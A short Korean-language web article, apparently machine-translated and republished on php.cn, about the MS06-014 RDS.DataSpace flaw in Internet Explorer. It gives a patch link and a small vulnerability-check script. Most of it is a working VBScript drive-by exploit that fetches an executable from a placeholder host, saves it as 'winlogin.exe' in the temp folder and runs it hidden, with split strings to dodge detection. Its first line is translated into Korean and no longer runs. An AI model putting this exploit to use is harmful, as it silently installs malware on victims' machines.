[최신 취약점] Rds.DataSpace를 사용하여 IE_Hacker Nature에서 바이러스 파일 다운로드 및 실행

WBOY
풀어 주다: 2016-05-16 19:18:45
원래의
1219명이 탐색했습니다.

다음 코드를 실행하여 귀하의 컴퓨터가 취약한지 테스트하십시오:


[Ctrl A 모두 선택 참고: 외부 J를 도입해야 하는 경우
]
패치를 실행하려면 새로 고쳐야 합니다. 다운로드: http://www.microsoft.com/china/technet/Security/bulletin/ms06-014.mspx

관련 바이러스의 VBS 코드는 다음과 같습니다. 코드는 다음과 같습니다.


오류 발생 시 다음 재개
dl = "http:// www.xxx.com/xxx.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="winlogin.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F .BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
<script> try { var Dts = new ActiveXObject("RDS.DataSpace"); var Stm = Dts.CreateObject("Microsoft.XmlHttp",""); alert("您的机器存在漏洞,请及时打上补丁。"); } catch(err) { alert("您的机器不存在该漏洞:" + err.message); } </script>
원천:php.cn
본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
인기 튜토리얼
더>
최신 다운로드
더>
웹 효과
웹사이트 소스 코드
웹사이트 자료
프론트엔드 템플릿